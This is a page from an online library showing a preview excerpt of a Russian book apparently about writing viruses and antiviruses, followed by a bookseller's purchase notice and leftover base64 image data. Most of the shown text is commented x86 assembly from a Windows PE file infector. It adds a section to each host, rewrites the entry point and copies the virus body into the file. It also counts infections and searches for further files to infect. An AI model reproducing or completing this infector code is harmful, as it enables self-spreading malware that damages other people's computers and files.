Создаем вирус и антивирус. Игорь Гульев. Читать онлайн. Newlib. NEWLIB.NET

Автор: Игорь Гульев
Издательство:
Серия:
Жанр произведения: Компьютеры: прочее
Год издания: 0
isbn: 5-89818-087-7
Скачать книгу
ecx,[ebp+offset objalign]

      xor edx,edx

      div ecx

      inc eax

      mul ecx

      mov dword ptr [ebp+offset imagesize],eax

      ;Скопируем новый объект в таблицу объектов

      mov ecx,10

      rep movsd

      ;Вычислим точку входа RVA

      mov eax,dword ptr [ebp+offset RVA]

      mov ebx,dword ptr [ebp+offset entrypointRVA]

      mov dword ptr [ebp+offset entrypointRVA],eax

      sub eax,ebx

      add eax,5

      ;Установим значение, необходимое для возврата в носитель

      mov dword ptr [ebp+offset subme],eax

      ;Поставим указатель позиции чтения/записи на начало PE−заголовка

      push 0

      push 0

      push dword ptr [ebp+offset peheaderoffset]

      push dword ptr [ebp+offset ahand]

      call SetFilePointer

      ;Запишем PE−заголовок и таблицу объектов в файл

      push 0

      lea eax,[ebp+offset bytesread]

      push eax

      push dword ptr [ebp+offset headersize]

      lea eax,[ebp+offset peheader]

      push eax

      push dword ptr [ebp+offset ahand]

      call WriteFile

      ;Увеличим счетчик заражений

      inc byte ptr [ebp+offset countinfect]

      ;Поставим указатель позиции чтения/записи

      ;по физическому смещению нового объекта

      push 0

      push 0

      push dword ptr [ebp+offset physicaloffset]

      push dword ptr [ebp+offset ahand]

      call SetFilePointer

      ;Запишем тело вируса в новый объект

      push 0

      lea eax,[ebp+offset bytesread]

      push eax

      push vend−vstart

      lea eax,[ebp+offset vstart]

      push eax

      push dword ptr [ebp+offset ahand]

      call WriteFile

      ;Закроем файл

      notape:

      push dword ptr [ebp+offset ahand]

      call CloseFile

      ;Переход к следующему файлу

      findnextone:

      ;Проверим, сколько файлов заразили: если 3,

      ;то выходим, если меньше – ищем следующий

      cmp byte ptr [ebp+offset countinfect],3

      jz outty

      ;Ищем следующий файл

      lea eax,[ebp+offset win32_data_thang]

      push eax

      push dword ptr [ebp+offset searchhandle]

      call FindNext

      ;Если файл найден, переходим к заражению

      or eax,eax

      jnz gofile

      ;Сюда попадаем, если файл не найден

      foundnothing:

      Конец ознакомительного фрагмента.

      Текст предоставлен ООО «ЛитРес».

      Прочитайте эту книгу целиком, купив полную легальную версию на ЛитРес.

      Безопасно оплатить книгу можно банковской картой Visa, MasterCard, Maestro, со счета мобильного телефона, с платежного терминала, в салоне МТС или Связной, через PayPal, WebMoney, Яндекс.Деньги, QIWI Кошелек, бонусными картами или другим удобным Вам способом.

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